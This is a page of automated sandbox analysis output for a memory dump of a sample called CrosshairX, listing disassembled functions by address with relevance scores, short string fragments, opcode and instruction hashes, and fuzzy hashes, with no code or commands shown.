
Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 9f1a0676bfc2b65899916276d61842e796911a4754c7f9424de8d8f66801ba0c
Instruction ID: 554654612073c2bd00a2c85a963b7777b95985233acd87ed2237f2cb71550855
Opcode Fuzzy Hash: 9f1a0676bfc2b65899916276d61842e796911a4754c7f9424de8d8f66801ba0c
Instruction Fuzzy Hash: 71523274608700DBE7149F28DC527AB73E2EB86324F54452DF5948B2E1E778D845CB8A

Function 0042A630 Relevance: 1.8, Strings: 1, Instructions: 563COMMON

Download Yara Rule

Strings

GD, xrefs: 0042AE61

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: GD
API String ID: 0-2404404916
Opcode ID: 922d48a5947f8ebdf8945f941db60658dda59deafef08b1edad3c93e38a0ab6e
Instruction ID: 3ba121e27a7464dffd3a699b93bb5f5e537d44a7f8c95b1b1a35ae04c2d85d7d
Opcode Fuzzy Hash: 922d48a5947f8ebdf8945f941db60658dda59deafef08b1edad3c93e38a0ab6e
Instruction Fuzzy Hash: 2D0213B46083508BD714CF24E89126BBBE1EF96304F18493EE9D58B391D738D95ACB4B

Function 00436400 Relevance: 1.8, Strings: 1, Instructions: 537COMMON

Download Yara Rule

Strings

3G, xrefs: 00436411

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: 3G
API String ID: 0-2222598309
Opcode ID: 1fd8933e0fd13bcb855c731066d42c18568ebe58e01e1cd6b6830ad78fe0e0ab
Instruction ID: d4fa9350d198f61b001c583df9ede3826520f95d886b3779624f33a2b4ddca79
Opcode Fuzzy Hash: 1fd8933e0fd13bcb855c731066d42c18568ebe58e01e1cd6b6830ad78fe0e0ab
Instruction Fuzzy Hash: 104225B1515B819FD3618F39C805793BFE9AB9A300F18486ED4EE87342C778A644CB66

Function 004223E6 Relevance: 1.7, Strings: 1, Instructions: 466COMMON

Download Yara Rule

Strings

|r, xrefs: 0042255A

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: |r
API String ID: 0-3724239489
Opcode ID: 4cbd05ccb661e34b9d51f29e164992bfd823dc87c791f75edab98bc9514db7d4
Instruction ID: f77bbff603927ece38dcee4d424ac586a01b912e6d32be68ba42e33c31f72565
Opcode Fuzzy Hash: 4cbd05ccb661e34b9d51f29e164992bfd823dc87c791f75edab98bc9514db7d4
Instruction Fuzzy Hash: 78D178B2A007128FC724CF24C992767B7B2FF95314B58865DD8929F7A0E778E801CB94

Function 0042F6A0 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

", xrefs: 0042F9D8

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 40379b3b7a8f1996759dfe97b0f887f764e29d7638f0e749bca7240099d60e0f
Instruction ID: 40a0d333b8a5ae2adc1b001fdcd7fb89c18a106307afca38ce0b0c8757936874
Opcode Fuzzy Hash: 40379b3b7a8f1996759dfe97b0f887f764e29d7638f0e749bca7240099d60e0f
Instruction Fuzzy Hash: E3C106B1B083246BD7258E24E450B6BB7F5AF84314FD8853EE49587381E738DC49C796

Function 0043EAD0 Relevance: 1.6, Strings: 1, Instructions: 370COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043ED10

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 2b9ac5b908ebe96dedc2624e873c6625181bca0a93219ff02f6a5ab604879a26
Instruction ID: dc4e338d2792a9e85ad10e1b15e840570e97d8123b016deb6fe7eac2c3cc7613
Opcode Fuzzy Hash: 2b9ac5b908ebe96dedc2624e873c6625181bca0a93219ff02f6a5ab604879a26
Instruction Fuzzy Hash: 81A136756053009BE314DF22C8C172BB7E2EBC8328F249A2EE4595B3D1D779DC068B99

Function 00436090 Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

h, xrefs: 0043623A

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: bb743c22a6eeb9ecc2f0ac4794e91eeed3a72cf1102222f39d6709ba4fc5258f
Instruction ID: 666945a216c5c7ccca669598578048f59c1f79b70f58e50306637d884142732d
Opcode Fuzzy Hash: bb743c22a6eeb9ecc2f0ac4794e91eeed3a72cf1102222f39d6709ba4fc5258f
Instruction Fuzzy Hash: 8CA14837759A920BE328993D4C5136B6D830BD7230F3FD77EA9B18B3E5D96988024345

Function 0041E610 Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

h, xrefs: 0041E7A9

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 94e84e96f31c38ef2bde2c4b6f1b9b7d9f9adcbe149451983ed303ee3ce43b5b
Instruction ID: 5616c38781d6dcff0c5733bd1be8c2bd5bd66475e04cf7259e15613cfa01e15e
Opcode Fuzzy Hash: 94e84e96f31c38ef2bde2c4b6f1b9b7d9f9adcbe149451983ed303ee3ce43b5b
Instruction Fuzzy Hash: D391383B659A814BE728853D4C513AA6AC30BD3330F2DC76EE9B5C73E5D56988424345

Function 00419F95 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

,D, xrefs: 0041A1F9

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: ,D
API String ID: 0-2491404905
Opcode ID: e8486291f5e0a7485cdb202356acaa6558fda6bd7ee5934d99446058ac9f43c5
Instruction ID: da4906d29284df569b70d44aff62c1e8e7ce322a411249aa41f46938bae624d6
Opcode Fuzzy Hash: e8486291f5e0a7485cdb202356acaa6558fda6bd7ee5934d99446058ac9f43c5
Instruction Fuzzy Hash: F69134745083419FD324CF24D8917ABB7E2EBC5318F148A2EE09987292D339D85ACB5B

Function 00409200 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

`, xrefs: 0040930E

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 5f8e702d608278123c95473e23042b0ba992d51b3dbc1e3dff1e287a1d188759
Instruction ID: 463915653b760c902326477b436916713c5e743ad202c61e7eb18b21ac700e84
Opcode Fuzzy Hash: 5f8e702d608278123c95473e23042b0ba992d51b3dbc1e3dff1e287a1d188759
Instruction Fuzzy Hash: 7061AF6018D3D18AD3118F35949035BFFE0AFA3358F185A6DE8D51B382C37A890ADB67

Function 00444870 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

BKD, xrefs: 00444AE2, 00444B03

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: BKD
API String ID: 0-3999503355
Opcode ID: 70a81cc2c5010cf7f0b420b66994b6a762c2b861a2110db18bfc3e6a13210d46
Instruction ID: b066f712a9f88b110cf838ecfd1ee7f254f833045f21e6ef78050cebaaaeb38f
Opcode Fuzzy Hash: 70a81cc2c5010cf7f0b420b66994b6a762c2b861a2110db18bfc3e6a13210d46
Instruction Fuzzy Hash: 0481363AA18222CFD700CF28E89031BB3A1FFCA315F1A84BDC98587765E7359959CB44

Function 00445B60 Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

,5./, xrefs: 00445B62

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: ,5./
API String ID: 0-1238817940
Opcode ID: 2516337a265ff13d6513fb38b801ddfef857d23bc7c8c96335848c27ec0fcc40
Instruction ID: 6bd27a6066c05fcfe60ace0fe6e05eb2f743102793f59d717b6c6498d866b297
Opcode Fuzzy Hash: 2516337a265ff13d6513fb38b801ddfef857d23bc7c8c96335848c27ec0fcc40
Instruction Fuzzy Hash: B781F035608B059FDB24DF28C880A6BB3F1EF89354F18862DE9958B3A2E735EC51C745

Function 0042FB40 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042FD3E

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: dfab50682000b419ea20a1441f51e1b5cf60502763b2e55c1df9dc3eadc68850
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: EE71E732B183254BD714CE29E48031BBBF2ABC5710FE9857EE89587355D338DC49878A

Function 00444960 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

BKD, xrefs: 00444AE2, 00444B03

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: BKD
API String ID: 0-3999503355
Opcode ID: 5ea404e615eb1695b4f315b3fb817ab4b424f8592e0f6c49eb2a1a275d7e4210
Instruction ID: 3164461a3975a3637779dc778912951ae8c901eadc7abc877a8742f1e1d28bff
Opcode Fuzzy Hash: 5ea404e615eb1695b4f315b3fb817ab4b424f8592e0f6c49eb2a1a275d7e4210
Instruction Fuzzy Hash: 2451253AB18312CFD304CF68E8A021BB3A1FFCA315F1A84BDCA8547665E7759859CB44

Function 0044497B Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

BKD, xrefs: 00444AE2, 00444B03

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: BKD
API String ID: 0-3999503355
Opcode ID: 018045d6c1914f5b3609168cc48913871007301316c1b640bfa9de137171379b
Instruction ID: 0d6b9641d9ff22e27fee2967b80d0859bfdd257ae30b60495854ce877cdee8b6
Opcode Fuzzy Hash: 018045d6c1914f5b3609168cc48913871007301316c1b640bfa9de137171379b
Instruction Fuzzy Hash: 0951063AB58311CFD304CF68E890217B3A1FBCA315F1A84BDCA4547765E7759859CB44

Function 00444979 Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

BKD, xrefs: 00444AE2, 00444B03

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: BKD
API String ID: 0-3999503355
Opcode ID: 711a5f4c0eba5dd2cd5fa629a1226691f0665a994127359ade10836e8cf6f33b
Instruction ID: b2138980f563f129f29bed586ca1202637e9a7df9c0b3223241970ece8c31577
Opcode Fuzzy Hash: 711a5f4c0eba5dd2cd5fa629a1226691f0665a994127359ade10836e8cf6f33b
Instruction Fuzzy Hash: 0A51063AB58322CFD3048F68E89031BB3A1FBCA315F1A84BDCA8543765E7759859CB44

Function 00444AC0 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

BKD, xrefs: 00444AE2, 00444B03

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: BKD
API String ID: 0-3999503355
Opcode ID: 91b7224e1b3e2d4df522e3036bc9ec0adf42a6789f83b9671dd8a74c3ccaf102
Instruction ID: 4b41674c1a5d2afae4bb9ed6a9e2a5739e0bbb176d1f9df17dad4c5c11ca96f5
Opcode Fuzzy Hash: 91b7224e1b3e2d4df522e3036bc9ec0adf42a6789f83b9671dd8a74c3ccaf102
Instruction Fuzzy Hash: 8A21743E714262CFC7448F68E8E05163365FF8E325B1A80B9CA0687676D77198A9CB84

Function 00402FA0 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa867034690293e6bbd521f48ef7f7be427359eb2317b6c7f8b6723f407d311
Instruction ID: e8b05d32b258606cb70e62cd7c75a7cd905677e41e9aef694b0ad9e66bab6ad0
Opcode Fuzzy Hash: 5fa867034690293e6bbd521f48ef7f7be427359eb2317b6c7f8b6723f407d311
Instruction Fuzzy Hash: 2B5205715083458FC714CF18C0806AABFE1BF89305F198A7EF8996B391D778EA49CB85

Function 00406860 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96f32b6ef410cc7003ba3082dfef64a7b5e02b70515b0deccafa357f6f64d56
Instruction ID: 237465bbef4eab86cfa4a9df85b9f4c59934f9d3f333d932bb5db31a49476a1e
Opcode Fuzzy Hash: c96f32b6ef410cc7003ba3082dfef64a7b5e02b70515b0deccafa357f6f64d56
Instruction Fuzzy Hash: 3952D170A08B848FE730CB34C4843A7BBE1AB91314F15883ED5EB567C2C27DA995874A

Function 00407640 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e0e0c8a8f7b7f60ff6657b1ae21f1ea5b816d1cf29eae59e5aba926e366c5c
Instruction ID: ce87272d52cbe1a5a0b5ef0ccfa1867683deef4e432db2c2ce341a58b0b69fb4
Opcode Fuzzy Hash: 89e0e0c8a8f7b7f60ff6657b1ae21f1ea5b816d1cf29eae59e5aba926e366c5c
Instruction Fuzzy Hash: 06228132A0C7118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B8518B47

Function 004039C0 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de4abbeb24f5c76aa6180575c0ef903dd12158edf9ecd8dcb48cae84c7b84c1d
Instruction ID: 4a4b99f0f7e9caf62610f2b13f6f35e2de4ce0fea29c4120e81aeaf37e7a7d29
Opcode Fuzzy Hash: de4abbeb24f5c76aa6180575c0ef903dd12158edf9ecd8dcb48cae84c7b84c1d
Instruction Fuzzy Hash: CF323370914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18

Function 00420F8A Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878ed7c4dd1c323bed28ced8982d1193d97c4a6414b06549f32496f4c13d6f72
Instruction ID: dd5dc295eff85035eb237b6f4461306ad6bfa8217edace3e0a98c0888bae0081
Opcode Fuzzy Hash: 878ed7c4dd1c323bed28ced8982d1193d97c4a6414b06549f32496f4c13d6f72
Instruction Fuzzy Hash: 68226B21508BC08ED7258A3C88953567F925B67238F2C879DE4FA4F3D3C67A8507C766

Function 00420818 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523d6a014e33683331d1e5572eef278042903533cdc5a276f298bdc3746889f0
Instruction ID: ba9d06203201e0765567920254adcb2f6122cdfd6086115a75ad8665c5d30d42
Opcode Fuzzy Hash: 523d6a014e33683331d1e5572eef278042903533cdc5a276f298bdc3746889f0
Instruction Fuzzy Hash: 9A124821508BC18ED7268A3C88887567F915B67228F6C87DDD4FA8F3D3C26AC507C766

Function 00405B70 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
Instruction ID: 0f92a2de222e582d479cc31b4866e21de8f351d1863752c1b31086e5efc20f79
Opcode Fuzzy Hash: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
Instruction Fuzzy Hash: 8AE179711087418FD721DF29C880A2BBBE1EF99300F44882EF5D597792E779E948CB96

Function 0043533C Relevance: .4, Instructions: 369COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e0d78f1881d9f4d37da1dd6b3dfaf9ccdff1c6bceeeee7d8b4bb5ad77e50fad
Instruction ID: 0071d11e626b586c88c6e327d85415dd0853e65fd6b333f781e970515f16d24a
Opcode Fuzzy Hash: 2e0d78f1881d9f4d37da1dd6b3dfaf9ccdff1c6bceeeee7d8b4bb5ad77e50fad
Instruction Fuzzy Hash: E2E10872608F808BD3268A38C8953A7BFD25BE6318F1C8A7DC4EE873C6D6796405C715

Function 00441F40 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6c6c3af42fcf20d33bb9a88a66ee91430fb220db6889fffa54565f621d1670
Instruction ID: bffb1623c24dd3728e2730826bcd695eae0f635574528f8f2f7569fed053e546
Opcode Fuzzy Hash: 6f6c6c3af42fcf20d33bb9a88a66ee91430fb220db6889fffa54565f621d1670
Instruction Fuzzy Hash: 79C1E17160C3418FD319CF28C99062FBBE2ABC9314F19866EE4E54B391D778E846CB56

Function 0041E200 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47f3f43a925e2f2aee051f8df02a78cf8605ec82cd6dab243ffdb7590bf1146
Instruction ID: a83d97fed51b1d21a96822b117e550c4b2e57dad06fee450753cc9219d3ee2cd
Opcode Fuzzy Hash: e47f3f43a925e2f2aee051f8df02a78cf8605ec82cd6dab243ffdb7590bf1146
Instruction Fuzzy Hash: EDB11539904210BFD7108F26DC45B5ABBE1BFD4315F148A3EF8D4932A1E73599448B46

Function 00433CB6 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ae4724c7753d137137b6fb8875543d99aaf9f4fa08cfd1ed4abf7c3a4fb9ebf
Instruction ID: 8a6b1760428aa2edea52de67365f77f909917beb3f1d0a03d9a5387c303aba51
Opcode Fuzzy Hash: 1ae4724c7753d137137b6fb8875543d99aaf9f4fa08cfd1ed4abf7c3a4fb9ebf
Instruction Fuzzy Hash: 07E1F572609F808FD3268B38C8943E7BFE29B96314F1C496DC4EE87382C6796545C716

Function 0041DEA0 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bd1efb4d19847c2b7ce9e99f918cfddd751a6aa61679e19da9b36c78b1cbd20
Instruction ID: ca655ce4652c85d288c4d98cc34c6a70928464866ab7a17df449dd6385188bcf
Opcode Fuzzy Hash: 2bd1efb4d19847c2b7ce9e99f918cfddd751a6aa61679e19da9b36c78b1cbd20
Instruction Fuzzy Hash: E7A16A76A042615BC7158E29885139BBBD2ABC5324F1D867EECF94B3D2C638CC4687C1

Function 004063D0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a88d76967b2daf3f2efff3a844aac06e3f491c903741e30a63c027bd60e8f0a4
Instruction ID: 36164190089234eba2bb10b877928e016ab285bfa36514e61e7ef17202719b5a
Opcode Fuzzy Hash: a88d76967b2daf3f2efff3a844aac06e3f491c903741e30a63c027bd60e8f0a4
Instruction Fuzzy Hash: 91C15CB29487418FC360CF28DC96BABB7E1BF85318F09492DD1DAD6342E778A155CB06

Function 0042C006 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db85d3b8cafc2f12cad9fd99eac2263cc895d6455a3a8789caa3a8c26eab8e2
Instruction ID: fa3138291ab7eee7bafac9d04551f2820df6d797534ad9472a562aa9b83c971d
Opcode Fuzzy Hash: 2db85d3b8cafc2f12cad9fd99eac2263cc895d6455a3a8789caa3a8c26eab8e2
Instruction Fuzzy Hash: F7A1AC7265C3259BD724DF18C05039FB7E2EBC5308F05892DE8E92B791D7B986099B83

Function 00445880 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eacd256e71b259a379725fdea683b4aeac4148ebebb23c1e80003f5cf0ef28c4
Instruction ID: c3ebeaccab979ca99297773d633574f302cc7e057f141f450b327afa4d6421cd
Opcode Fuzzy Hash: eacd256e71b259a379725fdea683b4aeac4148ebebb23c1e80003f5cf0ef28c4
Instruction Fuzzy Hash: 4581C2382047058BEB24DF1DD880A2BB3E2FF89354F14862DE9948B3A2DB35EC55CB45

Function 004385C0 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
